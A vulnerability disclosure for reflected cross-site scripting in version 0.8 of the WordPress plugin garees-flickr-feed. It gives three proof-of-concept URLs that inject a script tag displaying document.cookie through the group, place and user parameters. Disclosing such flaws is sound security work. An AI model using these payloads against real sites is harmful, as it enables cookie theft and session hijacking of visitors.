Wp Plugin Garees Flickr Feed

Plugin Details

Plugin Name: wp-plugin : garees-flickr-feed
Effected Version : 0.8 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Minimum Level of Access Required : Unauthenticated
CVE Number :
Identified by : Anantshri
WPScan Reference URL

Disclosure Timeline

Technical Details

http://localhost/wp-content/plugins/garees-flickr-feed/garees_flickr_feed_findgroups.php?group=group'><script>alert(document.cookie)</script>&
http://localhost/wp-content/plugins/garees-flickr-feed/garees_flickr_feed_findplaces.php?place=place'><script>alert(document.cookie)</script>&
http://localhost/wp-content/plugins/garees-flickr-feed/garees_flickr_feed_findusers.php?user=user'><script>alert(document.cookie)</script>&

 

Vulnerable Parameter : group, place, user

 

Type of XSS : Reflected